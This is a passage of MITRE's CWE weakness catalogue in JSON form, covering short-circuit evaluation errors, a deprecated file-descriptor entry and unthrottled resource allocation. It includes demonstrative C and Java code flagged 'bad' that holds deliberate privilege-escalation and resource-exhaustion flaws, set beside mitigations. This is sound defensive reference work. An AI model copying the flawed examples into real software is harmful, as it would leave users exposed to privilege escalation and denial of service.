void changePrice(float newPrice) {}","xhtml:br":"","xhtml:div":{"#text":"price = newPrice;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"The following example could be used to implement a user forum where a single user (UID) can switch between multiple profiles (PID).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Client {}","xhtml:div":{"#text":"private int UID;public int PID;private String userName;public Client(String userName){}public void setPID(int ID) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"PID = getDefaultProfileID();UID = mapUserNametoUID( userName );this.userName = userName;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"UID = ID;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer implemented setPID with the intention of modifying the PID variable, but due to a typo. accidentally specified the critical variable UID instead. If the program allows profile IDs to be between 1 and 10, but a UID of 1 means the user is treated as an admin, then a user could gain administrative privileges as a result of this typo."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"OOP31-PL","Entry_Name":"Do not access private variables or subroutines in other packages","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"This entry is closely associated with access control for public methods. If the public methods are restricted with proper access controls, then the information in the private variable will not be exposed to unexpected parties. There may be chaining or composite relationships between improper access controls and this weakness.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"768":{"attr":{"@_ID":"768","@_Name":"Incorrect Short Circuit Evaluation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring.","Extended_Description":{"xhtml:p":["Usage of short circuit evaluation, though well-defined in the C standard, may alter control flow in a way that introduces logic errors that are difficult to detect, possibly causing errors later during the software\'s execution. If an attacker can discover such an inconsistency, it may be exploitable to gain arbitrary control over a system.","If the first condition of an \\"or\\" statement is assumed to be true under normal circumstances, or if the first condition of an \\"and\\" statement is assumed to be false, then any subsequent conditional may contain its own logic errors that are not detected during code review or testing.","Finally, the usage of short circuit evaluation may decrease the maintainability of the code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Note":"Widely varied consequences are possible if an attacker is aware of an unexpected state in the software after a conditional. It may lead to information exposure, a system crash, or even complete attacker control of the system."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Minimizing the number of statements in a conditional that produce side effects will help to prevent the likelihood of short circuit evaluation to alter control flow in an unexpected way."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function attempts to take a size value from a user and allocate an array of that size (we ignore bounds checking for simplicity). The function tries to initialize each spot with the value of its index, that is, A[len-1] = len - 1; A[len-2] = len - 2; ... A[1] = 1; A[0] = 0; However, since the programmer uses the prefix decrement operator, when the conditional is evaluated with i == 1, the decrement will result in a 0 value for the first part of the predicate, causing the second portion to be bypassed via short-circuit evaluation. This means we cannot be sure of what value will be in A[0] when we return the array to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PRIV_ADMIN 0#define PRIV_REGULAR 1typedef struct{} user_t;user_t *Add_Regular_Users(int num_users){}int main(){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int privileges;int id;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"user_t* users = (user_t*)calloc(num_users, sizeof(user_t));int i = num_users;while( --i &amp;&amp; (users[i].privileges = PRIV_REGULAR) ){}return users;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"users[i].id = i;","attr":{"@_style":"margin-left:10px;"}}},{"#text":"user_t* test;int i;test = Add_Regular_Users(25);for(i = 0; i &lt; 25; i++) printf(\\"user %d has privilege level %d\\\\n\\", test[i].id, test[i].privileges);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]}},"Body_Text":"When compiled and run, the above code will output a privilege level of 1, or PRIV_REGULAR for every user but the user with id 0 since the prefix increment operator used in the if statement will reach zero and short circuit before setting the 0th user\'s privilege level. Since we used calloc, this privilege will be set to 0, or PRIV_ADMIN."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"769":{"attr":{"@_ID":"769","@_Name":"DEPRECATED: Uncontrolled File Descriptor Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-774. All content has been transferred to CWE-774.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"File Descriptor Exhaustion","attr":{"@_Date":"2017-11-08"}},{"#text":"Uncontrolled File Descriptor Consumption","attr":{"@_Date":"2019-01-03"}}]}},"770":{"attr":{"@_ID":"770","@_Name":"Allocation of Resources Without Limits or Throttling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.","Extended_Description":{"xhtml:p":"Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily.  Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-8"},"Method":"Manual Static Analysis","Description":"Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all."},{"Method":"Fuzzing","Description":{"xhtml:p":["While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause.","When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness."]},"Effectiveness":"Opportunistic"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results."},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Specialized configuration or tuning may be required to train automated tools to recognize this weakness.","Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits."},{"Phase":"Architecture and Design","Description":"Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410."},{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"This will only be applicable to cases where user input can influence the size or frequency of resource allocations."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"attr":{"@_Mitigation_ID":"MIT-38.1"},"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.","Ensure that all failures in resource allocation place the system into a safe posture."]}},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket &lt; 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) &gt; 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) &gt; 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) &gt; 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) &gt; 0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length &gt; 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &amp;message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length &gt; 0) &amp;&amp; (length &lt; MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]},{"Intro_Text":"An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-667"}}}},{"Intro_Text":"Here the problem is that every time a connection is made, more memory is allocated. So if one just opened up more and more connections, eventually the machine would run out of memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"bar connection() {}endConnection(bar foo) {}int main() {}","xhtml:div":[{"#text":"foo = malloc(1024);return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"free(foo);","attr":{"@_style":"margin-left:10px;"}},{"#text":"while(1) {}endConnection(foo)","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=connection();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}],"xhtml:br":["","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4017","Description":"Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts..","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2005-4650","Description":"CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4650"},{"Reference":"CVE-2020-15100","Description":"web application scanner attempts to read an excessively large file created by a user, causing process termination","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Close resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"229"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"469"}},{"attr":{"@_CAPEC_ID":"482"}},{"attr":{"@_CAPEC_ID":"486"}},{"attr":{"@_CAPEC_ID":"487"}},{"attr":{"@_CAPEC_ID":"488"}},{"attr":{"@_CAPEC_ID":"489"}},{"attr":{"@_CAPEC_ID":"490"}},{"attr":{"@_CAPEC_ID":"491"}},{"attr":{"@_CAPEC_ID":"493"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"528"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}},{"attr":{"@_External_Reference_ID":"REF-672"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}}]},"Notes":{"Note":[{"#text":"This entry is different from uncontrolled resource consumption (CWE-400) in that there are other weaknesses that are related to inability to control resource consumption, such as holding on to a resource too long after use, or not correctly keeping track of active resources so that they can be managed and released when they are finished (CWE-771).","attr":{"@_Type":"Relationship"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated 